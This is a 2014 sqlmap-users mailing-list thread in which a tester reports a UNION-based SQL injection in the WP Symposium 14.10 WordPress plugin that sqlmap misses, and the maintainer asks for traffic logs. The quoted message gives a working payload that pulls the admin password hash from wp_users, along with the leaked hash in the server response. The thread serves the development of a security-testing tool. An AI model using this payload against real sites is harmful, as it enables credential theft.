Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it

Mon, 15 Dec 2014 08:56:21 -0800 

Hi.

I don't see a reason why this form of UNION test would be any different
than the regular used by sqlmap. Can you please send me the traffic file
for such run (... --flush-session -t traffic.txt) along with console
output?

Bye
On Dec 15, 2014 5:50 PM, "Brandon Perry" <bperry.volat...@gmail.com> wrote:

> Hello!
>
> Playing around with the following vulnerabivlity:
>
> http://www.exploit-db.com/exploits/35505/
>
>
> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION
> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does
> result in a response from the server with the hash of the first user:
>
> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>
>
> However, sqlmap only finds a time based injection. Looking at sqlmap
> through burp, I do see sqlmap doesn't try an injection syntax like the one
> used in the PoC. It may be useful to add a syntax of UNION (SELECT
> CONCAT(blah, blah, blah) FROM blah).
>
> Just a thought!
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
>
> ------------------------------------------------------------------------------
> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
> with Interactivity, Sharing, Native Excel Exports, App Integration & more
> Get technology previously reserved for billion-dollar corporations, FREE
>
> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

------------------------------------------------------------------------------
Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
from Actuate! Instantly Supercharge Your Business Reports and Dashboards
with Interactivity, Sharing, Native Excel Exports, App Integration & more
Get technology previously reserved for billion-dollar corporations, FREE
http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to